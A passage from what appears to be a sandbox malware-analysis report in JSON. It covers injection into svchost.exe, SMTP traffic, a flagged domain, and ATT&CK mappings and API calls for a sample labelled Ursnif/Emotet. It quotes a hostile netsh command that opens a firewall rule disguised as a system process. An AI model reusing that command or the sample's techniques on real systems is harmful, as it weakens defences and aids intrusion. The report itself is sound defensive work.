\"C:\\Windows\\System32\\sc.exe\" (Handle: 472)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 472)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 588)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 588)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 588)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 568)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 568)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 568)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 516)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 516)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 516)\n \"hdvvshgu.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"hdvvshgu.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"hdvvshgu.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"hdvvshgu.exe\" wrote 86016 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"hdvvshgu.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00005776)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"hdvvshgu.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fdb74393b9d62dc0b9d62dc0b9d62dc0b9d62cc028d62dc0b0aebec0b6d62dc0d6a083c0b8d62dc0d6a0b3c0b8d62dc0d6a086c0a2d62dc0d6a0b0c0b8d62dc052696368b9d62dc000000000000000000000000000000000504500004c010400e1db595a0000000000000000e00002010b010a0000e60000004a0000000000006b9a0000001000000000010000000600001000000002000005000100000000000500010000000000005001000004000000000000020040810000100000100000000010000010000000000000100000000000000000000000b0120100a0000000000000000000000000000000000000000000000000000000004001005c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001005c0200000000000000000000000000000000000000000000000000002e74657874000000b0e400000010000000e6000000040000000000000000000000000000200000602e726461746100009a1e0000000001000020000000ea0000000000000000000000000000400000402e64617461000000581900000020010000020000000a0100000000000000000000000000400000c02e72656c6f630000f20f00000040010000100000000c01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\System32\\svchost.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:25", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-10", "type": 7, "relevance": 6, "name": "Sends network traffic on a typical mail related ports", "description": "Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)", "origin": "Network Traffic", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"lazystax.ru\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-303", "type": 9, "relevance": 10, "name": "Starts service using SC.exe", "description": "Process \"sc.exe\" with commandline \"start tpxhoiko\" (UID: 00000000-00005676)", "origin": "Monitored Target", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00004152)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94
https://hybrid-analysis.com/sample/12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94
Hybrid Analysis - Um_unhooking
{"size": 369152, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94", "sha256": "12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94", "av_detect": 77, "vx_family": "Trojan.Ursnif", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 110, "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 31944)", "1 Unknown Resource Files (build: 0)", "1 Unknown Objects (build: 31944)", "2 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 31944)"], "imported_objects": ["19 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 31823)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 31823)", "38 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 31823)", "20 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 29395)", "142 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 29395)", "10 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 29395)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (2 files)"], "total_file_compositions_imports": 2}, "processes": [{"uid": "00000000-00003088", "name": "12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe", "normalized_path": "C:\\12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe", "sha256": "12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94", "av_label": "AD.Emotet", "av_matched": 1, "av_total": 14}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 11}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94\" file has an entrypoint instructions - \"call\t0x402971,jmp\t0x4020c8,push\t0x14,push\t0x444250,call\t0x402ca0,push\t1,call\t0x402726,pop\tecx,test\tal, al,je\t0x40222e,xor\tbl, bl,mov\tbyte ptr [ebp - 0x19], bl,and\tdword ptr [ebp - 4], 0,call\t0x40262b,mov\tbyte ptr [ebp - 0x24], al,mov\teax, dword ptr [0x44cd04],xor\tecx, ecx,inc\tecx,cmp\teax, ecx,je\t0x40222e,test\teax, eax,jne\t0x402152,mov\tdword ptr [0x44cd04], ecx,push\t0x43c234,push\t0x43c218,call\t0x41c88f,pop\tecx,pop\tecx,test\teax, eax,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" loaded module \"RPCRT4.DLL\" at base 76500000\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" loaded module \"NTDLL.DLL\" at base 77a60000\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" loaded module \"KERNEL32.DLL\" at base 76220000\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" loaded module \"OLEAUT32.DLL\" at base 77c00000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter ZwCreateSection (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter ZwMapViewOfSection (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter ZwUnmapViewOfSection (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter RtlNtStatusToDosError (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter ZwClose (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter ZwQueryInformationToken (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter ZwOpenProcess (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter ZwOpenProcessToken (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter _snwprintf (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter memcpy (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter strcpy (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter sprintf (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter mbstowcs (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter _snprintf (UID: 00000000-00003088)\n 